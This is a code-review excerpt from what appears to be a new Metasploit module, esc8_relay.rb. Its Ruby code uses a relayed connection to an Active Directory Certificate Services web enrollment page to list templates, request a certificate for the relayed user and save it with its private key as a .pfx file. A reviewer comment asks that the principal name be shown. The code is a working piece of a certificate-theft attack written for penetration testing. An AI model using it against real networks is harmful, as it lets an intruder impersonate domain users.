modules/auxiliary/server/capture/esc8_relay.rb

```diff
@@ -0,0 +1,207 @@
+  end
+
+  def get_cert_list(client_socket)
+    req = client_socket.request_raw(
+      {
+        'method' => 'GET',
+        'uri' => "#{datastore['CERT_URI']}/certrqxt.asp"
+      }
+    )
+    res = client_socket._send_recv(req, @http_timeout, true)
+    raw_list = res.body.scan(/^.*Option Value="E;(.*?);/)
+    user_list = []
+    raw_list.each do |element|
+      user_list.append(element[0])
+    end
+    return user_list
+  rescue Exception => e
+    print_error(e.to_s)
+    elog("Error requesting certificate template list:\n #{e}")
+    raise e
+    return nil
+  end
+
+  def retrieve_cert(client_socket, cert_template, alt_user)
+    vprint_status("Sending Post to generate certificate for #{alt_user} using the #{cert_template} template")
+    begin
+      private_key = OpenSSL::PKey::RSA.new(4096)
+      request = create_csr(private_key, cert_template)
+      cert_template_string = "CertificateTemplate:#{cert_template}"
+      req = client_socket.request_cgi(
+        {
+          'method' => 'POST',
+          'uri' => "#{datastore['CERT_URI']}/certfnsh.asp",
+          'ctype' => 'application/x-www-form-urlencoded',
+          'vars_post' => {
+            'Mode' => 'newreq',
+            'CertRequest' => request.to_s,
+            'CertAttrib' => cert_template_string,
+            'TargetStoreFlags' => 0,
+            'SaveCert' => 'yes',
+            'ThumbPrint' => ''
+          }
+        }
+      )
+      res = client_socket._send_recv(req, @http_timeout, true)
+      vprint_status('Post Sent')
+      if res&.code == 200 && !res.body.include?('request was denied')
+        print_good("Certificate Request Granted using template #{cert_template} and user #{alt_user}")
+      else
+        print_bad("Certificate Request Denied using template #{cert_template} and user #{alt_user}")
+        return false
+      end
+    rescue Exception => e
+      print_error(e.to_s)
+      elog("Error sending POST request to generate Certificate: #{e}")
+      raise e
+      return nil
+    end
+    begin
+      location_tag = res.body.match(/^.*location="(.*)"/)[1]
+      vprint_status("Certificate location tag = #{location_tag}")
+      location_uri = "#{datastore['CERT_URI']}/#{location_tag}"
+      vprint_status('Requesting Certificate from Relay Target...')
+      req = client_socket.request_cgi(
+        {
+          'method' => 'GET',
+          'uri' => location_uri
+        }
+      )
+      res = client_socket._send_recv(req, @http_timeout, true)
+      info = nil
+      certificate = OpenSSL::X509::Certificate.new(res.body)
+      pkcs12 = OpenSSL::PKCS12.create('', '', private_key, certificate)
+      stored_path = store_loot('windows.ad.cs',
+                               'application/x-pkcs12',
+                               rhost,
+                               pkcs12.to_der,
+                               'certificate.pfx',
+                               info)
+      print_status("Certificate saved to #{stored_path}")
```

Comment:
This is the most important line of output for the users. Could we also add the principal name to the output so the user can quickly see who this cert was issued for?

Reply:
Done